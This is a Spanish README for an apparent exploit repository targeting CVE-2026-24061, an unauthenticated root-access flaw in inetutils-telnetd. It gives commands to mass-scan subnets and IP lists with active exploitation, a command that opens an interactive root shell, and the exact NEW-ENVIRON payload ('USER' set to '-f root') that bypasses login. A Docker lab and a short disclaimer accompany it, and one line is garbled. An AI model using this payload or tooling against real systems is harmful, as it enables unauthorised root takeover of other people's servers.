
Escáner y exploit interactivo para CVE-2026-24061 en inetutils-telnetd, que permite acceso root sin autenticación mediante una negociación NEW-ENVIRON manipulada. Incluye escaneo multihilo y laboratorio Docker.
👨💻 Autor: Furkan KAYAPINAR (@FurkanKAYAPINAR)
Este repositorio contiene un escáner de vulnerabilidades y un exploit interactivo para CVE-2026-24061. Esta vulnerabilidad afecta a inetutils-telnetd (y potencialmente a otras implementaciones de Telnet) mediante el manejo inadecuado de la opción Telnet NEW-ENVIRON, lo que permite acceso remoto sin autenticación previa utilizando el payload -f root.
--exploitinetutils-telnetd para pruebas seguras.Asegúrate de tener Python 3.x instalado.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## Uso
Escanea objetivos en busca de la vulnerabilidad NEW-ENVIRON.
# Escanear un objetivo individual
python3 scanner.py -t 192.168.1.100 -p 1903
# Escanear una subred
python3 scanner.py -s 192.168.1.0/24 -p 1903
# Escanear una lista de IPs e intentar explotación activa (verificación de RCE)
python3 scanner.py -l ips.txt -p 1903 --exploit
Obtén acceso interactivo a una shell root.
python3 exploit.py -t 127.0.0.1 -p 1903
Despliega un entorno vulnerable local para pruebas:
cd lab
docker-compose up -d --build
La vulnerabilidad se desencadena durante la fase de negociación de Telnet. Al responder a la solicitud DO NEW-ENVIRON del servidor con un paquete de sub-negociación especialmente manipulado IS VAR "USER" VALUE "-f root", el proceso telnetd del lado del servidor es engañado para pasar el flag -f root al proceso login, omitiendo la autenticación.
[!WARNING]
Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal y poco ético.